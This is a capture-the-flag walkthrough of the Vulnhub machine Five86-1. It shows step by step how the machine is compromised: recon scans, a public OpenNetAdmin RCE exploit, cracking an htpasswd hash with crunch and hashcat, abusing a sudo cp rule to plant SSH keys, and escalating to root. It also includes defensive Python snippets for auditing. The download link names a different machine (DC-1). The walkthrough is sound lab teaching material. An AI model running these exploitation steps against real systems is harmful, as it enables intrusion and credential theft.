Vulnhub Walkthrough Handbook: 04 Five86-1
Background:
Download address: https://www.vulnhub.com/entry/dc-1-1,292/
The target machine's IP in this run is 100.10.10.133; add it to the hosts file, mapped to the domain name five86.local.
Key techniques:
- Exploiting the OpenNetAdmin vulnerability
- Using find / -type f -user <username> to list the files that user owns and can read
- Using hash-identifier to identify the hash type
- Using crunch to generate a wordlist
- Using hashcat to crack the password
1. Information gathering
1.1 Scan for the target host's IP
Use arp-scan -l to scan for live hosts on the local network.
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1 00:50:56:c0:00:08 VMware, Inc.
100.10.10.133 00:0c:29:c3:7a:e0 VMware, Inc.
100.10.10.253 00:50:56:fd:dd:e0 VMware, Inc.
100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
Comparing MAC addresses shows that the target host's IP is 100.10.10.133.
1.2 Scan the target host's open ports
Use nmap -sS -Pn -p 1-65535 100.10.10.133 to detect the open ports on the target host.
└─# nmap -sS -Pn -p 1-65535 100.10.10.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 09:05 CST
Stats: 0:00:07 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 100.10.10.133
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:C3:7A:E0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
The scan shows that ports 22, 80 and 10000 are open on the target host.
1.3 Directory scan
Use dirb http://five86.local to scan for directories.
└─# dirb http://five86.local
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 29 16:00:23 2021
URL_BASE: http://five86.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://five86.local/ ----
+ http://five86.local/index.html (CODE:200|SIZE:30)
+ http://five86.local/reports (CODE:401|SIZE:459)
+ http://five86.local/robots.txt (CODE:200|SIZE:29)
+ http://five86.local/server-status (CODE:403|SIZE:277)
-----------------
END_TIME: Wed Dec 29 16:00:30 2021
DOWNLOADED: 4612 - FOUND: 4
The scan shows that the directories listed above exist.
2. Web site inspection
2.1 Getting a shell
Visiting http://five86.local shows no content at all. Opening http://five86.local/robots.txt shows the following.
User-agent: *
Disallow: /ona
This suggests a hidden directory at http://five86.local/ona. Opening it reveals the OpenNetAdmin management page, version 18.1.1.
Searching online shows that this version has an RCE vulnerability. The exploit can be downloaded here:
https://github.com/amriunix/ona-rce
Run cat ona-rce.py to see which arguments the exploit needs.
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
Run python3 ona-rce.py exploit http://five86.local/ona/ to obtain a shell on the target host.
└─# python3 ona-rce.py exploit http://five86.local/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$
2.2 Cracking the password
After some testing, commands that cannot execute normally produce no output; cd, for example, cannot be run. Try other commands.
sh$ uname -a
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ whoami
www-data
Use find / -type f -user www-data to list the files this user owns and can read.
……
/var/www/html/reports/.htaccess
find: '/var/log/private': Permission denied
find: '/var/log/apache2': Permission denied
find: '/var/log/mysql': Permission denied
find: '/var/log/exim4': Permission denied
/var/log/ona.log
……
The accessible files are /var/www/html/reports/.htaccess and /var/log/ona.log.
Open /var/www/html/reports/.htaccess and view its contents.
sh$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
This reveals a hidden path, /var/www/.htpasswd; read that file.
sh$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
This yields the username douglas and the hashed password $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1, with a hint that the password is 10 characters drawn from aefhrt.
Use hash-identifier to determine which hashing scheme was used.
└─# hash-identifier
--------------------------------------------------
HASH: $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
Possible Hashs:
[+] MD5(APR)
--------------------------------------------------
So the hash uses the MD5(APR) scheme.
Use crunch to generate the matching wordlist pass.txt with the command crunch 10 10 aefhrt -o pass.txt.
└─# crunch 10 10 aefhrt -o pass.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch: 21% completed generating output
crunch: 46% completed generating output
crunch: 60% completed generating output
crunch: 81% completed generating output
crunch: 100% completed generating output
Use hashcat to crack the hashed password with the command hashcat -m 1600 -a 0 -o res hash.txt pass.txt.
Running it on Kali gave an error, so it was run in WSL here.
The final password is fatherrrrr.
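As an added example (not part of the original walkthrough), the following Python audits an htpasswd line the way a defender would: it identifies the $apr1$ scheme, reimplements Apache's MD5(APR) hash so a candidate password can be verified, and computes how small the hinted keyspace (10 characters over aefhrt) actually is. The htpasswd line is the one recovered above; the 60466176 candidate count is the same figure crunch reported.

```python
import hashlib
import re

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Line taken from the /var/www/.htpasswd shown in this walkthrough.
HTPASSWD_LINE = "douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1"


def _to64(value: int, n: int) -> str:
    """crypt(3)-style base64: n six-bit groups, least significant first."""
    return "".join(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(n))


def apr1_md5(password: str, salt: str) -> str:
    """Apache $apr1$ hash: the md5crypt construction with magic '$apr1$' (1000 MD5 rounds).
    Salted but fast and unsalted-per-round, which is why a small keyspace falls quickly."""
    pw, s, magic = password.encode(), salt.encode(), b"$apr1$"
    ctx = hashlib.md5(pw + magic + s)
    alt = hashlib.md5(pw + s + pw).digest()
    for i in range(len(pw), 0, -16):          # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[:min(16, i)])
    i = len(pw)
    while i:                                   # one byte per bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):                      # the stretching loop
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(s)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    f = final
    enc = "".join(_to64((f[a] << 16) | (f[b] << 8) | f[c], 4)
                  for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return f"$apr1${salt}${enc}{_to64(f[11], 2)}"


def check_htpasswd_line(line: str, candidate: str) -> dict:
    """Classify the stored hash and report whether `candidate` reproduces it."""
    user, _, stored = line.strip().partition(":")
    m = re.match(r"^\$apr1\$([^$]{1,8})\$(.{22})$", stored)
    if not m:
        return {"user": user, "scheme": "other", "match": None}
    # MD5(APR) is still accepted by Apache but is weak; bcrypt ($2y$) is the supported alternative.
    return {"user": user, "scheme": "MD5(APR)", "weak": True,
            "match": apr1_md5(candidate, m.group(1)) == stored}


def keyspace(alphabet: str, length: int) -> int:
    """Number of distinct passwords of `length` over `alphabet` (6**10 for the hint above)."""
    return len(set(alphabet)) ** length
```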
2.3 SSH remote login
2.3.1 User douglas
Connect remotely with ssh douglas@100.10.10.133.
└─# ssh douglas@100.10.10.133
douglas@100.10.10.133's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:26:43 2021 from 100.10.10.129
douglas@five86-1:~$
This is a proper TTY, but permissions are still restricted; use sudo -l to see which commands may be run.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
The result shows that cp may be run as user jen.
If /home/jen/.ssh/authorized_keys contains douglas's public key, douglas's id_rsa file can be used to log in to jen's SSH account, i.e. passwordless login as jen. The key is first copied to /tmp because jen has no permission to access files under douglas's home directory.
The commands are as follows.
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
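The sudo rule above is a classic misconfiguration: a file-copying binary runnable as another user is effectively write access to that user's files. As an added example (not from the original walkthrough), this Python parses sudo -l output and flags such rules; the sample output is the one shown above and the set of flagged binaries is an assumption of the example.

```python
import re

# Binaries whose normal job is to write files; assumption of this example, not an exhaustive list.
FILE_WRITERS = {"cp", "mv", "tee", "dd"}

# Constructed from the `sudo -l` output shown in this walkthrough.
SUDO_L_OUTPUT = """\
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
"""

RULE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*)?(.+)$")


def parse_sudo_l(text: str):
    """Yield (run_as, nopasswd, command) for each rule line such as '(jen) NOPASSWD: /bin/cp'."""
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue                       # Defaults and header lines carry no rule
        for cmd in m.group(3).split(","):
            yield m.group(1).strip(), bool(m.group(2)), cmd.strip()


def audit(text: str) -> list:
    """Return the rules that let the caller write arbitrary files as another user."""
    findings = []
    for run_as, nopasswd, cmd in parse_sudo_l(text):
        base = cmd.split()[0].rsplit("/", 1)[-1]      # '/bin/cp' -> 'cp'
        if cmd == "ALL" or base in FILE_WRITERS:
            findings.append({
                "run_as": run_as,
                "nopasswd": nopasswd,
                "command": cmd,
                # Fix: drop the rule, or restrict it to a wrapper with fixed source and destination.
                "risk": f"arbitrary file write as {run_as} (e.g. ~{run_as}/.ssh/authorized_keys)",
            })
    return findings
```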
2.3.2 User jen
Log in as jen over SSH with the command ssh -i id_rsa jen@127.0.0.1.
douglas@five86-1:~$ ssh -i id_rsa jen@127.0.0.1
Warning: Identity file id_rsa not accessible: No such file or directory.
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Tue Dec 28 21:36:24 2021 from 127.0.0.1
jen@five86-1:~$
Use find / -type f -user jen to list the files the current user owns and can read.
……
/var/mail/jen
……
View that file.
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
The mail reveals the username moss and the password Fire!Fire!.
2.3.3 User moss
Log in with ssh moss@127.0.0.1.
jen@five86-1:~$ ssh moss@127.0.0.1
moss@127.0.0.1's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:43:08 2021 from 127.0.0.1
moss@five86-1:~$
Use ls -la to list every file in the current directory.
moss@five86-1:~$ ls -al
total 12
drwx------ 3 moss moss 4096 Jan 1 2020 .
drwxr-xr-x 7 root root 4096 Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 9 Jan 1 2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan 1 2020 .games
A hidden directory, .games, is found.
Enter it and list the files again: there is a root-owned binary named upyourgame.
Running it magically yields root privileges.
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? yes
Could you please repeat that? yes
Nope, you'll need to enter that again. yes
You entered: No. Is this correct? no
We appear to have a problem? Do we have a problem? no
Made in Britain.
# whoami
root
# id
uid=0(root) gid=1001(moss) groups=1001(moss)
# cd /root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
Flag obtained!